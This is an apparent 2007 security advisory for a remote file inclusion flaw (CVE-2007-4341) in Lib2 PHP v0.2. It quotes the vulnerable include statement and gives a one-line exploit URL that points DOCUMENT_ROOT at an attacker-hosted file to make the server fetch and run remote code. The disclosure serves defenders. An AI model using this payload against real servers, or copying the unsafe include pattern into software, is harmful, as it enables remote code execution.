Lib2 PHP v0.2 (DOCUMENT_ROOT) Remote File Inclusion Vulnerability

2007.08.15

Credit: ilkerkandemir

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-4341

CWE: CWE-Other

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

------------------------------------------------------------------------
-------------------------------------------

MefistoLabs.Com PreSents...

Script: Lib2 PHP v0.2
Script Download1: http://www.omnistarinc.com/~fonin/projects/lib2/lib2-0.2.tar.gz
Script Download2: http://freshmeat.net/projects/lib2/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
include "$DOCUMENT_ROOT/../lib/config.php";
------------------------------------------------------------------------
-------------------------------------------

Exploit:  [lib2_path]/adm/my_statistics.php?DOCUMENT_ROOT=http://attacker.txt?

------------------------------------------------------------------------
-------------------------------------------

Tnx: Ajann,Dumenci,H0tturk,Str0ke

# MefistoLabs.Com

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Lib2 PHP v0.2 (DOCUMENT_ROOT) Remote File Inclusion Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Lib2 PHP v0.2 (DOCUMENT_ROOT) Remote File Inclusion Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.